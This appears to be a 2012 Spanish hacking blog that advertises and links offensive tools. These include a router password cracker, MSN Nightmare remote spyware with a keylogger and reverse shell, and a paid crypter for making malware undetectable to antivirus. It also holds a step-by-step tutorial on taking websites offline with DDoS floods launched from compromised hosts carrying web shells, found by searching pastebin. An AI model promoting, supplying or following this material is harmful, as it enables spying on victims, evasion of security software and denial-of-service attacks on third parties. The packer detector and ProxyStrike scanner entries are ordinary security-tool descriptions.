30 ago 2012

Router Password Kracker v1.0 28

Router Password Kracker es un programa creado por SecurityXploded que sirve para recuperar la contraseña de tu router. También se puede utilizar para recuperar la contraseña de tu módem o de algunos sitios Web que están protegidos por autenticación HTTP basica.

Generalmente los routers o módems usan el mecanismo de autenticación HTTP basica para acceder a la configuracion. En palabras simples, cuando se conecta a su módem / router desde el navegador (normalmente por http://192.168.1.1, http://10.0.0.2, etc..), se le pedirá que introduzca el nombre de usuario y contraseña. Si olvida la contraseña, entonces no será capaz de acceder a la configuracion de su router / módem. Incluso algunos sitios web utilizan esta autenticación básica para permitir que sólo ciertos usuarios tengan acceso a su sitio.



Router Password Kracker utiliza la tecnica de recuperación de contraseña por diccionario. Por defecto viene con un archivo diccionario (passlist.txt) adecuado para Routers. En internet tambien se pueden encontrar buenos diccionarios de contraseñas (wordlist).

Para las contraseñas complejas, se pueden utilizar herramientas comoCrunch o Cupp para generar ataques por fuerza bruta basados en diccionarios personalizados


Modo de uso
  1. Colocar la direccion IP del router / modem en donde dice "IP Adress".
  2. Colocar el usuario del router / modem donde dice "User name". Generalmente es admin, 1234, la compañia de internet, etc.. el usuario es facil de conseguirlo con una simple busqueda en google.
  3. Agregar el diccionario o wordlist en donde dice "Password dictionary file".
  4. Click en "Start crack".

Descarga:
Router Password Kracker v1.0 - (Descarga directa Tuchost sin publicidad)
Router Password Kracker v1.0 - (Pagina oficial con publicidad)

Contraseña/Password: http://troyanosyvirus.com.ar

Pagina oficial: http://securityxploded.com/router-password-kracker.php


9 ago 2012

MSN Nightmare v2.2 final


MSN Nightmare és una pequeña aplicación que te permite interceptar remotamente todo lo que se envia o recibe del msn messenger e incluso intervenir en medio de una conversación suplantando el pc en el que está instalado. A día de hoy no es detectado por ningún antivirus y cómo utiliza técnicas de inyección tampoco es detectado por ningún firewall.
Características:
* Espiar conversaciones de msn messenger
* Intervenir en una conversacion suplantando al pc remoto
* Evitar recepción i/o envio de mensajes
* Recuperación de passwords del messenger (en el registro y por keylogger)
* Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
* Desinstalar remotamente
* Shell Inversa
* Pequeña utilidad para comprobar si tienes los puertos del router abiertos
* Función subir log de conversaciones y passwords a ftp para no tener que abrir puertos
* Conexión sin necesidad de determinar ips
* Mucho mas estable que la versión 1
* Escaneado con 21 antivirus, no es detectado por ninguno.

Imagenes

Pantalla principal:



Con la victima conectada:


Video tutorial:



Descargar:
MSN Nightmare v2.2 - (Descarga directa TucHost)
MSN Nightmare v2.2 (rapidshare)
pass: msnNightmare


RDG Packer Detector 0.6.9

RDG Packer Detector es una aplicacion creada por RDGMax que sirve para detectar Packers, Crypters, Compiladores, Packers Scrambler, Joiners, Installers, y demas de algun archivo ejecutable.

Se utiliza generalmente en ingenieria inversa.



Caracteristicas

-Posee sistema de detección Rápida.
-Posee sistema de detección Potente Analizando el archivo completo, permitiendo la muli-detección de packers en varios casos.
-Permite crear signaturas tus propias signaturas de detección.
-Posee Analizador Crypto-Grafico.
-Permite calcular el checksum de un archivo.
-Permite calcular el Entropy, informando si el programa analizado esta comprimido, encriptado o no.
-Detector de OEP (Punto de entrada Original) de un programa.
-Puedes Chequear y descargar signaturas.Así siempre tú RDG Packer Detector estará Actualizado.
-Loader de Plug-ins..
-Convertidor de Signaturas.
-Detector de Falseadores de Entry Point.
-De-Binder un extractor de archivos adjuntos.
-Sistema Heuristico Mejorado. 

Lo Nuevo de la version v0.6.9!

-Nueva Interfaz!
-Detección en Modo Rápido y Modo Potente Mejorada!
-Base de Signaturas Súper Actualizada!
-Detección Heuristica de Binders
-Detección y Extracción de Overlay!
-Chequeo y Actualización Automática!
-Detección Súper Rápida de Hash MD5!
-Soporte Múltiple de Plug-ins tanto para RDG Packer Detector como de otros detectores!
-Detección Múltiple de Formatos MPG,GIF,RAR,ZIP,MP3 etc.
-Detección y extracción de Archivos Adjuntos!.
-Heuristica Mejorada!
-Mayor Estabilidad!
-Compatible Windows Vista & Windows 7
-Optimizacion en velocidad de escaneo
-Deteccion M-A (Rapida) Totalmente integrada a la interfaz Principal
-De Nuevo Multiple Lenguaje.
-Y Mucho Más!

Descarga
RDG Packer Detector 0.6.9 - 2012 - (Descarga directa Tuchost)

Contraseña del rar: troyanosyvirus.com.ar

Pagina oficial: www.rdgsoft.8k.com


10 jul 2012

Proxy Strike


ProxyStrike v2.1 es una herramienta diseñada para encontrar vulnerabilidades mientras navega por una aplicación. Fue creada debido a los problemas que enfrentamos en los pentests de aplicaciones web que depende en gran medida de JavaScript.

En este momento se dispone con plugins de inyección SQL y XSS. Ambos plugins están diseñados para capturar las vulnerabilidades. El proceso es muy simple, ProxyStrike funciona como un proxy escucha en el puerto 8008 por defecto, así que tienes que navegar por el sitio Web que desee configurar su navegador para usar ProxyStrikecomo un proxy, y ProxyStrike analizará todos los parámetros en modo de fondo.

Características:

  • Plugin de motor (Crea tus propios plugins!)
  • Solicitud de interceptor
  • Solicitar diffing
  • Solicitud de repetidor
  • Proceso de rastreo automático
  • Solicitud/respuesta HTTP historia
  • Estadísticas de petición de parámetro
  • Solicitar valores de los parámetros estadísticas
  • URL de la petición de parámetro y la firma de campo de la cabecera
  • El uso de un proxy alternativo (TOR, por ejemplo)
  • Sql ataques (plugin)
  • Server Side Includes (plugin)
  • Ataques XSS (plugin)
  • Registros de ataque
  • Exportación de resultados a HTML o XML


Podemos encontrarla en: Aplicaciones - Backtrack - Vulnerability Assessment - Web Aplication Assessment - Web Vulnerability Scanners  - ProxyStrike

O si no, la abrimos desde la consola:

root@bt:~# cd /pentest/web/proxystrike
root@bt:/pentest/web/proxystrike# ls
attacker.py    crllr.py      LICENSES       plugins         TextParser.pyc
attacker.pyc   crllr.pyc     mainform.py    Proxynet.py     tools
consoleNg.py   __init__.py   mainform.pyc   Proxynet.pyc    webanalyzer.py
consoleNg.pyc  injector.py   mainform.ui    proxystrike.py  webanalyzer.pyc
console.py     injector.pyc  mainGUI.py     README
console.pyc    injector.ui   mainGUI.pyc    reqresp.py
crawler.py     iSearch.py    paConsole.py   reqresp.pyc
crawler.pyc    iSearch.pyc   paConsole.pyc  TextParser.py
root@bt:/pentest/web/proxystrike# python proxystrike.py





Ahora si queremos realizar un Scaneo a un sitio web, solo nos dirigimos a la pestaña Crawler,  colocamos la web y le damos Running.

Video Demostrativo:

Realizando Poderosos Ataques DDoS

¿Te Gustaría Dejar Off Cualquier Sitio Web con un Click? Si tu respuesta es SI, entonces esto te interesara :) Antes de empezar con esto, quiero resaltar que esta entrada la escribiré con el fin de satisfacer a algunos amigos/compañeros y usuarios, la cual me han estado insistiendo que escriba sobre los ataques DDoS que brindo a algunos clientes que compran acceso a mi sistema de ataques. La entrada tratara sobre como realizar ataques DDoS hacia servidores webs, con una herramienta que actualmente no es muy conocida en Latino America y es totalmente privada. Ahora bien, empecemos con el concepto de DDoS según WikiPedia: En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima. Métodos de Ataque: - SYYN - UDP - ICMP Conociendo el pequeño concepto de los Ataques DDoS y algunos métodos sobre ello, ya procederemos a realizar dicho ataque. Pero algunas personas para poder realizar dicho ataque lo primero que hacen es ir a google y escribir: programas DDoS la cual google les arrojara una lista de programas que realizan dichos ataques, pero ninguna funciona. Entonces como el programita DDoS no les funciona, buscaran otros métodos, por lo que se encuentran con Botnets, entonces descargan dicha Botnet, la configuran y empiezan a infectar como locos... Algunas Botnets son efectivas, siempre y cuando tenga una cantidad mayor de bots, como por ejemplo si desean atacar un sitio grande, maximo tienen que tener 2 mil bots a mas... pero si desean un sitio pequeño maximo 500 bots, dependiendo que tan poderosa sea la Botnet... Entonces, en estos tiempos a la gente le aburre estar infectando, haciendo Ing. Social para que ejecuten su "malware", spammeando o estan todo el dia en una PC para conseguir unos 20 bots... que no les servira para nada... Pero bueno como vos sos inteligente... haras eso? perderás tu tiempo usando troyanitos o alguna botnet? estaras sentado todo el dia en una pc infectando? YO CREO QUE PIERDEN SU TIEMPO USANDO ESAS COSAS... Pero si vos sos tan paciente o te gusta estar rogando a las personas para que ejecuten tu malware, podes dejar de leer esto... pero si crees que no todo esta perdido podes seguir leyendo este hilo... Continuando con el tema... si eres de esas personas que han atacado a un sitio web con Botnet o algún programa DDoS y no han logrado su objetivo y/o piensan que es todo lo que pueden hacer.. pues estan totalmente equivocados porque esta vez les enseñare otro metodo mas actual para que puedan dejar off cualquier sitio web, asi tengan proteccion DDoS.. ¿Increible no? Este método trata de realizar los ATAQUES DESDE SERVIDORES WEBS (HACKEDS HOST) ¿No entiendes? Te explico... mira este link: http://secuity2.hostingfire.org/ddos.php

Se que alguna vez lo has visto por ahi y es antiguo... pero como vos sabras es una herramienta para realizar ataques DDoS desde paginas webs (servidores)

Entonces si yo ataco a una web desde esa herramienta... el ataque sera simple y no hara mucho efecto el ataque, por lo tanto otra vez estaremos fracasando...

Pero... ¿No se te ocurre nada? ¿No? Pues.. a mi SI, te explico..


Como ya vistes el ataque desde la pagina web esa... sabemos que nosotros no estamos atacando, osea me refiero a nuestra ip... la cual cuando enviaremos el ataque a cualquier web, en los logs aparecera la IP de la pagina web mas no la nuestra... por lo tanto estamos protegiendo nuestra IP del ataque...


Pero como vemos que con un solo ataque desde la pagina web esa no lograremos nada... entonces haremos esto.


Sabemos que tenemos para atacar desde esta web:
http://secuity2.hostingfire.org/ddos.php

Por lógica sabremos que estamos enviando unos 5 MB de ataque porque solo es un host...

Entonces si queremos que el ataque sea mucho mas fuerte y poderoso, tenemos que tener muchas paginas webs con la misma herramienta o alguna otra pero que realice el mismo funcionamiento de ataques...

Ejemplo:

1 host = 5 MB DE ATAQUE
1000 host = 1GB - 2GB

Conociendo dicho ejemplo, ya sabemos que tenemos que conseguir mas host para subir nuestra herramienta DDoS..

Pero te preguntaras... ¿Como consigo tantos Host?

Pues, te pones a "hackear" sitios webs... con uno que hackees ya podras entrar a muchos... haciendole symlink o rooteando el server... como maximo puedes sacar unos 200 host en una sola web...

O si no sabes "hackear" webs y queres algo mas facil... entras a http://pastebin.com/ y en el cuadro de busqueda colocas una de estas:


/x32.php


/greenshell.php


/shell.php


/webdav /

Encontraras muchas shells, de diferentes tipos, las cuales son:

- GEST
- POST
- SLOWLORIS

Por lo que obtendrás una larga lista de hackeds host con shell o con la herramienta DDoS ya subida...

En una lista podremos encontrar unos 500 host con shells... entonces es logico que no todos estarán funcionando, pero para eso necesitamos una Shell Checker para comprobar cuales son las shells que estan funcionando o no.

Teniendo la lista con las shells, la guardamos en un archivo .txt y abrimos la Shell Checker y la cargamos:




Ahora le damos Start para comprobar cuales son las shells que estan funcionando.




Como vemos, en este caso obtuvimos 12 Shells UDP funcionando, la cual procederemos a guardarla.


Ok bien... teniendo ya muchos host con la herramienta DDoS, procederemos a realizar Ataques DDOs a cualquier sitio web...

Pero te preguntaras.. ¿Como hago para atacar desde diferentes host a la misma vez?


Muy fácil... me imagino que alguna vez usastes o usas alguna Botnet, por lo tanto sabes que tienes unos archivos php que se configuran para que todos los bots vayan a una sola DB, en este caso es bots.sql o db.sql


Ahora bien, en este caso es lo MISMO, me refiero a la configuración... tenes que subir los archivos a tu hosting de PAGO, configuras todo, subes tu db.sql y listo.


Configurado todo, entraras a tu panel, donde tendrás una opción que dice: ADD SHELL, por lo que ahi agregaras todas los host que tienes hackeado o con alguna herramienta DDoS... 


Ejemplo: 
http://feeds2.feedburner.com/alivingtruth/DRwH = 1 HACKED HOST

Lo agregas a tu BASE DE DATOS:






Por lo que tendras ya una SHELL ONLINE:

Ahora solo te toca ir a UDP FLOOD para que puedas atacar con todas las shells que tengas agregadas.


Una vez le des Initiate Attack, el sitio web a la que has atacado, automáticamente estará offline, siempre y cuando tengas muchas shells con la que puedas atacar...

Y así ya no estarás como LOCO usando botnet, troyanos o algun programita que no te funcionaran...

¿No me crees?

Mira este video, en la cual configuro los archivos y dejo OFF a http://www.backtrack-linux.org/


Nota: Para que funcionen los ataques, no agregues shells como la c99.php o alguna shell para "defacear" tenes que subir el archivo udp.php la cual esta en este link: http://pastebin.com/JscK1V3b

Necesitas los archivos o acceso a mi boot?
Contact: ghost_franco@hotmail.com

Saludos..

2 jul 2012

Elite Protector - Public and Private Version

Elite Protector es una nueva herramienta creada en Turquia por WHO!, basicamente sirve para proteger tus archivos. Es ideal para los que trabajan con malware, y HOY en dia es la mejor herramienta que existe del estilo. Ya no se nesesitara tener a mano 10 herramientas para trabajar con tu malware y dejarlo indetectable. Elite protector trae todo en una sola aplicacion, encripta tu aplicacion y la deja 100% indetectable a todos los antivirus, hasta se saltea la defensa proactiva del Kaspersky 2009 y los firewalls.
Incluye un binder para juntar tu malware con cualquier archivo, ya sea una foto, video o cualquier aplicacion, Cambia el icono, agrega mensajes de error durante la ejecucion, agrega metodos de ocultacion, desabilita objetos en la pc victima, protege tu server de SandBoxes y de maquinas virtuales, comprime con UPX y FSG, y muchisimo mas.

Esto no es nada comparado con todo lo que tiene esta poderosa herramienta. A continuacion informacion mas detallada de sus propiedades.


Propiedades

-Opciones
*Anti sandboxie
*Anti Maquinas virtuales
*Bypass defensa Proactiva del kaspersky
*Comprimir el archivo (UPX,FSG,UCL..)
*Ejecutar oculto
*Melt (Borrar archivo al ejecutar)
*Ejecucion en memoria.
*Conservar EOF data
*Realinear PE header
*Eliminar los recursos no utilizados
*Establecer atributos de archivo +H y +S
*Universal Anti Sandboxes
*Validar PE header
*Incrementar sitio con bytes
*Anti VMware
*Anti Anubis sandbox
*Anti Norman sandbox
*Anti CW sandbox
*Anti sunblet sandbox
*Anti "is debug present"
*Anti Thread expert
*Anti JoeBox
*Anti Olly Debug
*Anti Filemon
*Anti Regmon
*Anti Procmon

*Inyectar el archivo en un proceso especifico (FWB+)
-Explorador por defecto
-Seleccionar
*Drop del archivo
-Nombre de archivo:
-Cambiar atributos del archivo (oculto, solo lectura y sistema)
*Cambiar la fecha del archivo por una mas antigua
*Cambiar la extension del archivo
*Proteger el archivo con contraseña
*Desactivar modo a prueba de errores
*Desactivar Administrador de tareas
*Desactivar editor de registro
*Desactivar Restauracion de sistema
*Desactivar Regedit
*Desactivar Ejecutar
*Desactivar Escritorio
*Desactivar Barra de herramientas
*Desactivar Boton inicio
*Desactivar MsConfig

-Configurar cuadro de mensajes

-Icono
*Mantiene icono original
*Sin icono (ahorra unos pocos Kbs)
*Reemplazar el icono (32 Bits)

-Multi Encriptacion
-Llave de encriptacion aleatoria
-Juntar con uno o mas archivos

A continuacion algunas imagenes del programa




Stub Publico - Gratis
El stub publico es un "Simple XOR", es totalmente gratis y al dia de hoy deja un 99% indetectable el server del Poison Ivy y del Bifrost, pero en unos dias este se tornara detectado y ya no dejara indetectable las aplicaciones encriptadas. Por tal motivo si deseas comprar un Stub privado lee mas abajo.

Descarga:
Elite Protector v1.0 Public (mediafire)
Elite Protector v1.0 Public (badongo)
Elite Protector v1.0 Public (rapidshare)



Stub Privados - 70 EurosLos Stubs privados garantizan 100% de indetectabilidad en tus archivos por un muy largo tiempo, Actualmente tenemos 9 Stubs disponibles, cada uno tiene un precio de 70 Euros, y puedes comprar la cantidad que desees, cada stub es unico.

Stubs disponibles:

[1] Twofish
[2] Blowfish
[3] CryptAPI
[4] DES
[5] Gost
[6] SimpleXOR
[7] RC4
[8] Skipjack
[9] Tiny

Garantia
Los stubs privados tienen una garantia: En caso de que algun antivirus llegara a detectar tu stub, este sera reemplazado directamente, por una nueva version totalmente indetectable. Esto solo se realizara una vez por stub.
(Aclaracion: Esto no quiere decir que tu stub sera detectado en cualquier momento, a veces pueden tardar años sin ser detectado, pero nadie puede asegurar tal cosa.)

Compras
Si estas interesado en comprar elite protector con un stub privado por 70 Euros envia un mail a ventas.tyv@gmail.com o contactame mediante LA PAGINA DE CONTACTO y te respondere a la brevedad.